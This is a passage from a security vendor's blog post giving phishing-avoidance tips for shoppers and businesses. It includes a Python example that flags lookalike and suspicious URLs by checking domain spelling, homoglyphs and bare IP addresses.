  • Don’t provide personal information, such as passwords and credit card numbers, on unknown websites
  • Use only reputable websites for online shopping
  • Avoid using unsecure public Wi-Fi networks; if you must, use a virtual private network (VPN) to stay safe
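The "spoofed domains with hard-to-catch spelling variations" and "unknown domains, long string of numbers" signals above can be turned into a mechanical check, which is useful both for training material and for a mail-gateway or browser-extension rule. The following is an added example written for this page, not SonicWall code; the brand list, the tiny second-level-suffix table and the homoglyph map are constructed assumptions (a production version would use the organization's own allow-list and the Public Suffix List). It deliberately ignores the scheme, because, as the APWG figure shows, an HTTPS lock no longer distinguishes a real site from a spoofed one.

```python
import re
from urllib.parse import urlsplit

# Constructed list of brand domains for this example; a real deployment would use
# the organisation's own allow-list of retailers, carriers and internal domains.
TRUSTED_DOMAINS = {
    "amazon.com", "walmart.com", "fedex.com", "ups.com", "usps.com", "paypal.com",
}

# Digit-for-letter substitutions commonly used to build lookalike names (assumed set).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

# Labels under which the registrable name sits one level deeper (example.co.uk).
# Deliberately tiny; the Public Suffix List is the real answer for production.
SECOND_LEVEL = {"co", "com", "org", "net", "gov", "ac", "edu"}


def registrable_domain(host: str) -> str:
    """Return the owner-registered part of a hostname (heuristic, see SECOND_LEVEL)."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and labels[-2] in SECOND_LEVEL and len(labels[-1]) == 2:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (Wagner-Fischer, single-row DP)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def fold_lookalikes(label: str) -> str:
    """Map 'amaz0n' -> 'amazon' and 'arnazon' -> 'amazon' before comparing."""
    return label.translate(HOMOGLYPHS).replace("rn", "m")


def check_url(url: str, trusted=TRUSTED_DOMAINS) -> list:
    """Return the reasons a URL looks like a phishing link; [] means no finding.
    The scheme is ignored on purpose: HTTPS says nothing about who owns the site."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    if not host:
        return ["no host in URL"]
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        return ["host is a bare IP address"]

    findings = []
    if re.search(r"\d{8,}", host):
        findings.append("long digit string in host")

    domain = registrable_domain(host)
    if domain in trusted:
        return findings  # genuine brand domain; only the generic checks apply

    labels = host.split(".")
    subdomains = labels[: len(labels) - len(domain.split("."))]
    sld = domain.split(".")[0]
    folded = fold_lookalikes(sld)

    for full in sorted(trusted):
        name = full.split(".")[0]
        max_dist = 1 if len(name) < 6 else 2  # short names collide too easily at 2
        if sld == name:
            findings.append(f"'{domain}' uses the {name} name under a different TLD than {full}")
        elif folded == name or edit_distance(folded, name) <= max_dist:
            findings.append(f"'{domain}' is a lookalike of {full}")
        elif len(name) >= 5 and name in folded:
            findings.append(f"'{domain}' embeds the brand name {name}")
        elif name in subdomains:
            findings.append(f"{name} appears as a subdomain of unrelated domain '{domain}'")

    if not findings:
        findings.append(f"'{domain}' is not a known/trusted domain")
    return findings


if __name__ == "__main__":
    # Constructed sample links of the kinds described above (not real campaigns).
    for link in [
        "https://www.amazon.com/dp/B0001234567",
        "http://paypa1.com/signin",
        "https://amazon.com.account-verify.xyz/update",
        "http://secure-login-3849201735.walmart-verify.net/",
        "http://192.168.1.10/track",
    ]:
        print(link, "->", check_url(link) or ["no findings"])
```

The four brand checks are ordered from strongest to weakest signal: an exact brand name under another TLD, a name within one or two edits after folding digit homoglyphs, a brand embedded in a longer registrable name, and a brand used only as a subdomain of an unrelated domain. Anything that matches none of them but is still not on the allow-list is reported as unknown, which is the "unknown domains" case from the tips above; the edit-distance threshold is tightened for short brand names such as "ups" because two edits would otherwise match ordinary words.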

Tips for organizations, businesses and enterprises to keep their employees safe:

  • Refresh employee awareness and training programs to help them identify phishing emails
  • Ensure endpoint devices are patched and updated
  • Implement layered security with the following critical components:

SonicWall automated, real-time breach detection and prevention solutions help organizations implement a layered security architecture for enterprises, SMBs, governments, retailers, healthcare organizations and more.

Exclusive Video: Why Layered Security Matters

SonicWall President and CEO Bill Conner and CTO John Gmuender walk you through the current cyber threat landscape, explore the importance of automated real-time breach detection and prevention, and address how to mitigate today’s most modern cyberattacks.